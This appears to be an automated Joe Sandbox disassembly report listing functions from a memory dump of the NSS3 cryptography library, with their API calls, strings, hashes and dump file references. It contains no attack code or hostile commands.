Opcode Fuzzy Hash: 6bf7714fac6804e0a8564e391d7d508667da508bf60e67311b2f82ee268391bb
Instruction Fuzzy Hash: 8F21B0B5A05601CFCB00EF78C58465EBBF0FF59318F19896AD89887701EB30E886CB91

Function 6CAAACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CAAACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAAAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAAAD23

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAAAD39

Strings

C_MessageDecryptFinal, xrefs: 6CAAACE1
hSession = 0x%x, xrefs: 6CAAACFE, 6CAAAD0E
(CK_INVALID_HANDLE), xrefs: 6CAAAD1C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: ba1458139ba81e59d1d74279d7bf45e8b557d508863d700dd8e9d1a338bd8350
Instruction ID: e5bb8f5692aec2f021a789d32e963af264846dbee302426fa37a46aa282e6610
Opcode Fuzzy Hash: ba1458139ba81e59d1d74279d7bf45e8b557d508863d700dd8e9d1a338bd8350
Instruction Fuzzy Hash: A8212F34601194AFDB009FA4DD98B6E77B5EB46319F444429E80997611DB34AC8ECB92

Function 6CB80ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CB80EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CB80EFA

Part of subcall function 6CA6AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CA6AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB80F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB80F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB80F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB80F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CB80ED9, 6CB80EE5, 6CB80F06, 6CB80F0B
Aborting, xrefs: 6CB80EB3

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 06d4a2a791e1452ff2492308da69d97e2cc4a9d068f54eadb1292b12ab430791
Instruction ID: 7029b5b8ac957466616da6a3f2203329475ba4ed9332dfd83309147f17de9b30
Opcode Fuzzy Hash: 06d4a2a791e1452ff2492308da69d97e2cc4a9d068f54eadb1292b12ab430791
Instruction Fuzzy Hash: 6E0184B6901154ABDF016F54EC458AF3F7DEF473A4B004064FD0997B11D671EA5086A2

Function 6CB44D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB44DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB44DE0

Strings

misuse, xrefs: 6CB44DD5
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB44DCB
invalid, xrefs: 6CB44DB8
API call with %s database connection pointer, xrefs: 6CB44DBD
%s at line %d of [%.10s], xrefs: 6CB44DDA

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 92d947f5ccd489f3e83f95bd3c6a89063a6f64fd0a6f3dcb8662d02b81b8a782
Instruction ID: 966e62dd8dc472714bbc5a212b14ea7f8d75d90b6828f00538b74d7613d1996b
Opcode Fuzzy Hash: 92d947f5ccd489f3e83f95bd3c6a89063a6f64fd0a6f3dcb8662d02b81b8a782
Instruction Fuzzy Hash: 08F05915E0C9F42BD7004865CD11FC63355CF01339F0A49A0FD047BE66E209AC788BD2

Function 6CB44DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB44E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB44E4D

Strings

misuse, xrefs: 6CB44E42
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB44E38
invalid, xrefs: 6CB44E25
API call with %s database connection pointer, xrefs: 6CB44E2A
%s at line %d of [%.10s], xrefs: 6CB44E47

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: b753b623072ec95a6df2908c1b8ec937f6189beb4b7c6be3d0e8ba8410bc81e9
Instruction ID: 9bd1be4e2711103c4cc95ee4b11ee35cd5a25c2655a97096b6a7ddf8bc3cbfc9
Opcode Fuzzy Hash: b753b623072ec95a6df2908c1b8ec937f6189beb4b7c6be3d0e8ba8410bc81e9
Instruction Fuzzy Hash: 0FF05214E8C8E82BEB0404619C10FA63389CB02339F0CC4A0EA0837E82D709987116A2

Function 6CAB0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6CAB1444,?,00000001,?,00000000,00000000,?,?,6CAB1444,?,?,00000000,?,?), ref: 6CAB0CB3

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CAB1444,?,00000001,?,00000000,00000000,?,?,6CAB1444,?), ref: 6CAB0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CAB1444,?,00000001,?,00000000,00000000,?,?,6CAB1444,?), ref: 6CAB0DEC

Part of subcall function 6CAD0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CA72AF5,?,?,?,?,?,6CA70A1B,00000000), ref: 6CAD0F1A
Part of subcall function 6CAD0F10: malloc.MOZGLUE(00000001), ref: 6CAD0F30
Part of subcall function 6CAD0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CAD0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CAB1444,?,00000001,?,00000000,00000000,?), ref: 6CAB0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CAB1444,?,00000001,?,00000000), ref: 6CAB0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CAB1444,?,00000001,?,00000000,00000000,?), ref: 6CAB0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6CAB1444,?,00000001,?,00000000,00000000,?,?,6CAB1444,?,?,00000000), ref: 6CAB0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CAB1444,?,00000001,?,00000000,00000000,?), ref: 6CAB0E79

Part of subcall function 6CAC1560: TlsGetValue.KERNEL32(00000000,?,6CA90844,?), ref: 6CAC157A
Part of subcall function 6CAC1560: EnterCriticalSection.KERNEL32(?,?,?,6CA90844,?), ref: 6CAC158F
Part of subcall function 6CAC1560: PR_Unlock.NSS3(?,?,?,?,6CA90844,?), ref: 6CAC15B2

Part of subcall function 6CA8B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CA91397,00000000,?,6CA8CF93,5B5F5EC0,00000000,?,6CA91397,?), ref: 6CA8B1CB
Part of subcall function 6CA8B1A0: free.MOZGLUE(5B5F5EC0,?,6CA8CF93,5B5F5EC0,00000000,?,6CA91397,?), ref: 6CA8B1D2

Part of subcall function 6CA889E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CA888AE,-00000008), ref: 6CA88A04
Part of subcall function 6CA889E0: EnterCriticalSection.KERNEL32(?), ref: 6CA88A15
Part of subcall function 6CA889E0: memset.VCRUNTIME140(6CA888AE,00000000,00000132), ref: 6CA88A27
Part of subcall function 6CA889E0: PR_Unlock.NSS3(?), ref: 6CA88A35

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 770679b5d8955447fdea98080a1cf3436f035853cbb81471349383f2097999d4
Instruction ID: e2e8028c1629e7a995ba7c5b341ed9efe35e780bc6594e9b3cfd3c501b6d4513
Opcode Fuzzy Hash: 770679b5d8955447fdea98080a1cf3436f035853cbb81471349383f2097999d4
Instruction Fuzzy Hash: 9251A7F5D012405FEB009F64DE81ABF37BC9F45258F190064ED09AB752FB31ED5986A2

Function 6CA66E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6CA66ED8
sqlite3_value_text.NSS3(?,?), ref: 6CA66EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CA66FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6CA66FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CA66FF0
sqlite3_value_blob.NSS3(?,?), ref: 6CA67010
sqlite3_value_blob.NSS3(?,?), ref: 6CA6701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CA67052

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: e77e8159214dd4b3c21c5cebfb1c88aa5e446faa83927f049c153176a11d16b3
Instruction ID: f9041b0db9718ae52a0f6ab24c2bcc316527198cbcfbb948adf0303573a19cf3
Opcode Fuzzy Hash: e77e8159214dd4b3c21c5cebfb1c88aa5e446faa83927f049c153176a11d16b3
Instruction Fuzzy Hash: 5861D6B1E252458FDB00CF66D9007EEB7B2AF45308F184169D855EBF51E7319C89CBA0

Function 6CAD8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6CAD7313), ref: 6CAD8FBB

Part of subcall function 6CAD07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA78298,?,?,?,6CA6FCE5,?), ref: 6CAD07BF
Part of subcall function 6CAD07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CAD07E6
Part of subcall function 6CAD07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD081B
Part of subcall function 6CAD07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD0825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6CAD7313), ref: 6CAD9012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6CAD7313), ref: 6CAD903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6CAD7313), ref: 6CAD909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6CAD7313), ref: 6CAD90DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6CAD7313), ref: 6CAD90F1

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6CAD7313), ref: 6CAD906B

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6CAD7313), ref: 6CAD9128

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 934eda5b51d3ad07d457d77c88c7bfd116dafb0773cc68db455ca895dd634e39
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: 67518071A002018FEB509F7ADE54B26B3F9AF44358F1A4129E915D7B61EF31F884CB91

Function 6CA89C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6CA88850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CA90715), ref: 6CA88859
Part of subcall function 6CA88850: PR_NewLock.NSS3 ref: 6CA88874
Part of subcall function 6CA88850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CA8888D

PR_NewLock.NSS3 ref: 6CA89CAD

Part of subcall function 6CB398D0: calloc.MOZGLUE(00000001,00000084,6CA60936,00000001,?,6CA6102C), ref: 6CB398E5

Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607AD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607CD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607D6
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9F204A), ref: 6CA607E4
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,6C9F204A), ref: 6CA60864
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA60880
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,6C9F204A), ref: 6CA608CB
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608D7
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608FB

TlsGetValue.KERNEL32 ref: 6CA89CE8
EnterCriticalSection.KERNEL32(?,?,6CA8ECEC,6CA92FCD,00000000,?,6CA92FCD,?), ref: 6CA89D01
TlsGetValue.KERNEL32(?,?,?,6CA8ECEC,6CA92FCD,00000000,?,6CA92FCD,?), ref: 6CA89D38
EnterCriticalSection.KERNEL32(?,?,6CA8ECEC,6CA92FCD,00000000,?,6CA92FCD,?), ref: 6CA89D4D
PR_Unlock.NSS3 ref: 6CA89D70
PR_Unlock.NSS3 ref: 6CA89DC3
PR_NewLock.NSS3 ref: 6CA89DDD

Part of subcall function 6CA888D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA90725,00000000,00000058), ref: 6CA88906
Part of subcall function 6CA888D0: EnterCriticalSection.KERNEL32(?), ref: 6CA8891A
Part of subcall function 6CA888D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CA8894A
Part of subcall function 6CA888D0: calloc.MOZGLUE(00000001,6CA9072D,00000000,00000000,00000000,?,6CA90725,00000000,00000058), ref: 6CA88959
Part of subcall function 6CA888D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CA88993
Part of subcall function 6CA888D0: PR_Unlock.NSS3(?), ref: 6CA889AF

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: f7665826cadabeee492ca0f28855663ad339a7e289a597ac826a90272844e0ff
Instruction ID: 06f9b4a1969da199f4e0e01bedaf720a3293a034a310c9379869ef404ec52345
Opcode Fuzzy Hash: f7665826cadabeee492ca0f28855663ad339a7e289a597ac826a90272844e0ff
Instruction Fuzzy Hash: 0E5143B1A067059FDB00EF78C28469EBBF0BF44359F158569D8989BB11EB30E8C4CB91

Function 6CB89EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CB89EC0
EnterCriticalSection.KERNEL32(?), ref: 6CB89EF9
_PR_MD_UNLOCK.NSS3(?), ref: 6CB89F73
EnterCriticalSection.KERNEL32(?), ref: 6CB89FA5
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6CB89FCF
_PR_MD_UNLOCK.NSS3(?), ref: 6CB89FF2
_PR_MD_UNLOCK.NSS3(?), ref: 6CB8A01D

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: e2b437748fbcf0043846b5804e4492233e2fffc5fc5706f53beb0adaf25d934b
Instruction ID: 1b11407da215152b2d14a3ddd2f9c9fa81249d35df75d8738639300db99e8f43
Opcode Fuzzy Hash: e2b437748fbcf0043846b5804e4492233e2fffc5fc5706f53beb0adaf25d934b
Instruction Fuzzy Hash: 7D51AEB2C01651CBCB109F25D88068AB7F4FF4431AF25856AD85997B52EB31F889CFD2

Function 6CAB88E0 Relevance: 12.1, APIs: 8, Instructions: 112COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAB88FC

Part of subcall function 6CACBE30: SECOID_FindOID_Util.NSS3(6CA8311B,00000000,?,6CA8311B,?), ref: 6CACBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6CAB8913

Part of subcall function 6CAD0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA787ED,00000800,6CA6EF74,00000000), ref: 6CAD1000
Part of subcall function 6CAD0FF0: PR_NewLock.NSS3(?,00000800,6CA6EF74,00000000), ref: 6CAD1016
Part of subcall function 6CAD0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA787ED,00000008,?,00000800,6CA6EF74,00000000), ref: 6CAD102B

SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6CB9D864,?), ref: 6CAB8947

Part of subcall function 6CACE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6CACE245
Part of subcall function 6CACE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6CACE254

SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CAB895B
DER_GetInteger_Util.NSS3(?), ref: 6CAB8973
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAB8982
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAB89EC
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CAB8A12

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
String ID:
API String ID: 2145430656-0
Opcode ID: 4f691430619b883f0804cfc982f79f6000548b52f391adf7adcdda168614d50d
Instruction ID: 1c16e64210631f2906770e9358bd46a70bc3b75ea8247d77fb1f3ddca32a8adf
Opcode Fuzzy Hash: 4f691430619b883f0804cfc982f79f6000548b52f391adf7adcdda168614d50d
Instruction Fuzzy Hash: B4310A71A0464156FF2052BDAC417AA369D9B9136CF280737D519F7A82FB36C4CA8193

Function 6CA94E50 Relevance: 12.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA94E90
EnterCriticalSection.KERNEL32 ref: 6CA94EA9
TlsGetValue.KERNEL32 ref: 6CA94EC6
EnterCriticalSection.KERNEL32 ref: 6CA94EDF
PL_HashTableLookup.NSS3 ref: 6CA94EF8
PR_Unlock.NSS3 ref: 6CA94F05
PR_Now.NSS3 ref: 6CA94F13
PR_Unlock.NSS3 ref: 6CA94F3A

